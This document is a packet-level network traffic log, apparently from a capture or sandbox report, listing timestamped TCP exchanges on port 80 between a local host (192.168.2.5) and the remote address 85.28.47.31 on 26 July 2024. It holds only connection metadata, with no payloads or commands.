Jul 26, 2024 17:56:16.336050034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.336082935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.336114883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.336127043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.336148977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.336159945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.336194992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.336199045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.336232901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.336246014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.336282015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.336309910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.336344004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.336359978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.336375952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.336390972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.336422920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.392874956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.392909050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.392942905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.392951012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.393013000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.393019915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.393019915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.393044949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.393059015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.393079042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.393101931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.393121004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.393420935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.393471956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.423609018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.423660994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.423696041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.423733950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.423744917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.423763037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.423779964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.423827887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.423827887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.423862934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.423862934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.423878908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.423909903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.423913002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.423962116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.423963070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.424005985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.424285889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.424339056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.424340010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.424371958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.424381018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.424405098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.424413919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.424438953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.424448013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.424472094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.424475908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.424515009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.429888964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.429928064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.429960966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.429970026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.429995060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430016994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430022955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430027962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430041075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430061102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430072069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430093050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430104971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430125952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430138111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430160999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430171013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430195093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430206060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430227995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430237055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430269003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430269957 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430304050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430314064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430337906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430351973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430372953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430382013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430406094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430416107 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430438995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430450916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430471897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430480003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430505037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430515051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430538893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430546999 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430571079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430583954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430603981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430613995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430636883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430649042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430671930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430705070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430730104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430730104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430752993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430756092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430788994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430800915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430821896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430838108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430862904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430870056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430896044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430907011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430932045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430942059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430965900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.430977106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.430998087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.431010008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.431030989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.431041002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.431051016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.431097031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.431097031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.528825998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.538916111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713460922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713490009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713501930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713548899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.713577032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.713598013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713608980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713619947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713630915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713641882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.713664055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.713696957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713706970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713738918 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.713767052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.713869095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713880062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713891029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713902950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713918924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.713921070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713932991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713932991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.713943005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713953972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713964939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.713974953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.713992119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.714010000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.714188099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714198112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714209080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714230061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.714232922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714250088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714257002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.714266062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714277983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714287996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.714288950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714299917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714310884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714322090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714323044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.714334011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714339972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.714344978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714356899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714359999 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.714366913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714378119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.714384079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.714411974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.714535952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.715569973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715581894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715595007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715605974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715616941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715630054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715641022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715651035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715653896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.715653896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.715663910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715665102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.715689898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.715702057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715709925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.715713024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715735912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715739965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.715747118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715758085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715759039 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.715769053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715779066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.715779066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715791941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715802908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715810061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.715835094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.715845108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715856075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715863943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715876102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715886116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715887070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.715898037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715909958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.715949059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.795890093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.795902014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.795912981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.795986891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.795989990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796000004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796010971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796024084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796035051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796036005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796046019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796057940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796061039 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796070099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796081066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796091080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796093941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796113968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796138048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796139956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796149969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796160936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796171904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796184063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796184063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796195030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796205044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796205997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796216011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796228886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796238899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796237946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796251059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796339035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796339035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796502113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796514034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796524048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796545982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796577930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796648026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796658993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796669006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796674013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796685934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796693087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796724081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796747923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796768904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796781063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796791077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796802044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796813011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796813965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796823025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796833992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796834946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796845913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796855927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796857119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796869040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.796900988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796900988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.796933889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.797262907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.797302961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.798264980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.798276901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.798285961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.798295975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.798307896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.798314095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.798317909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.798325062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.798335075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.798346043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.798346043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.798367023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.798415899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.803195953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803235054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803246021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803258896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.803301096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.803301096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.803356886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803366899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803375959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803388119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803400040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.803426027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.803455114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.803589106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803599119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803608894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803617954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803627014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.803627968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803638935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803647995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.803649902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803659916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803672075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803682089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.803716898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.803889990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803900003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803910017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803920031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803930998 CEST	80	49704	85.28.47.31	192.168.2.5
